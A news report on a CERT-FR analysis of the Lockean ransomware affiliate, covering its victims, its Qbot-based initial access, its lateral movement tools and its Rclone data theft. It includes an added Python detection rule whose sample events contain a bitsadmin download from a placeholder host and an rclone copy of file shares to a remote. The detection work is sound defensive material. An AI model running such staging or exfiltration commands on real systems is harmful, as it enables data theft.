Details about the tools and tactics used by a ransomware affiliate group, now tracked as Lockean, have emerged today in a report from France’s Computer Emergency Response Team (CERT).
Over the past year and a half, the threat actor has compromised the networks of at least eight French companies, stealing data and deploying malware from multiple ransomware-as-a-service (RaaS) operations.
Lockean activity was first noticed in 2020 when the actor hit a French company in the manufacturing sector and deployed DoppelPaymer ransomware on the network.
Between June 2020 and March 2021, Lockean attacked at least seven more companies with various ransomware families: Maze, Egregor, ProLock, REvil.
Activity of the Lockean ransomware affiliate
Among compromised businesses are transport company Gefco, the Ouest-France newspaper, and the pharmaceutical companies Fareva and Pierre Fabre.
Four additional companies, unnamed by CERT-FR, were identified as victims of Lockean from reports to ANSSI, France’s national cybersecurity agency, and two incidents described by private organizations Intrinsec and The DFIR Report.
Lockean ransomware affiliations
In most of the attacks described in the report, the threat actor gained initial access to the victim network through Qbot/QakBot, a banking trojan that has shifted to distributing other malware, including the ProLock, Egregor, and DoppelPaymer ransomware strains.
Qbot was spread through emails from the now-defunct Emotet botnet as well as a lesser-known malware distribution service tracked as TA551, a.k.a. Shathak, UNC2420, and Gold Cabin.
In at least one known instance, Lockean used the IcedID malware distribution service to get access to the network.
Lockean initial access via Qbot/QakBot
For lateral movement, the threat actor used the Cobalt Strike penetration testing framework, and the freely available Adfind, BloodHound, and BITSadmin tools.
CERT-FR notes in the report that Lockean’s average cut of paid ransoms was 70%, the rest going to the RaaS maintainers.
To increase profits, the actor adopted the double-extortion model and stole data from the victim (via the Rclone tool) before encrypting the machines.
Under the threat of a data leak, which carries larger privacy and legal implications, victims were more likely to pay a negotiated ransom.
From start to finish, a typical Lockean intrusion would look as follows:
Lockean group - infection chain
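As an added example (not code from the CERT-FR report or this article), the Python below turns the chain above into a simple detection rule: it matches the discovery, staging and exfiltration tools named here (AdFind/BloodHound, BITSadmin, Rclone) against process-creation command lines and alerts when an Rclone transfer follows discovery or staging activity anywhere in the estate within a week. The events, hostnames, paths and regexes are constructed placeholders and assumptions.

```python
import re
from datetime import datetime, timedelta

# Stage patterns keyed to the tools CERT-FR attributes to Lockean; the regexes are assumptions.
STAGE_PATTERNS = {
    "discovery": re.compile(r"\b(adfind|sharphound|bloodhound)(\.exe)?\b", re.I),
    "staging":   re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I),
    "exfil":     re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)\b", re.I),
}

# Constructed process-creation events (not real telemetry); hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    {"ts": "2021-03-01T09:02:00", "host": "WS-12", "cmd": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"ts": "2021-03-01T09:15:00", "host": "WS-12", "cmd": r"C:\Users\Public\adfind.exe -f objectcategory=computer"},
    {"ts": "2021-03-01T09:40:00", "host": "WS-12", "cmd": r"bitsadmin.exe /transfer job1 http://placeholder.invalid/a.dat C:\Users\Public\a.dat"},
    {"ts": "2021-03-02T22:10:00", "host": "FS-01", "cmd": r"C:\ProgramData\rclone.exe copy D:\Shares remote:store -q"},
    {"ts": "2021-03-20T08:00:00", "host": "WS-07", "cmd": r"C:\Program Files\Backup\rclone.exe sync C:\Data remote:backup"},
]

def classify(cmd):
    """Return the intrusion stage a command line matches, or None for benign lines."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(cmd):
            return stage
    return None

def tool_hits(events):
    """All events matching a stage, sorted by time, as (datetime, host, stage) tuples."""
    hits = []
    for ev in events:
        stage = classify(ev["cmd"])
        if stage:
            hits.append((datetime.fromisoformat(ev["ts"]), ev["host"], stage))
    return sorted(hits)

def find_chains(events, window=timedelta(days=7)):
    """Alert on each Rclone transfer preceded, within `window`, by discovery or BITSadmin
    staging on any host: the chain in the article spans workstations and file servers."""
    hits = tool_hits(events)
    alerts = []
    for ts, host, stage in hits:
        if stage != "exfil":
            continue
        earlier = [(h, s) for t, h, s in hits if s != "exfil" and ts - window <= t < ts]
        if earlier:
            alerts.append({"exfil_host": host, "exfil_ts": ts.isoformat(), "preceded_by": earlier})
    return alerts
```

The lone Rclone run on WS-07 produces no alert because nothing in the discovery or staging stages precedes it within the window; tune the window and patterns to your own telemetry.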
While CERT-FR’s data on Lockean’s tactics, techniques, and procedures is based on eight incidents, the group is likely more active than that and hit a larger number of companies.
Looking at the indicators of compromise in the report, Valéry Marchive of LeMagIT found several IP addresses related to Conti ransomware, indicating Lockean’s affiliation with additional RaaS operations and its targeting of businesses in other regions.
Lockean is the second ransomware affiliate identified this year. In August, the FBI shared information about OnePercent, an actor that has been hitting organizations in the U.S. with various ransomware strains.
Like Lockean, OnePercent is affiliated with multiple RaaS operations (Maze, Egregor, REvil) and has stolen data before deploying the file-encryption routine.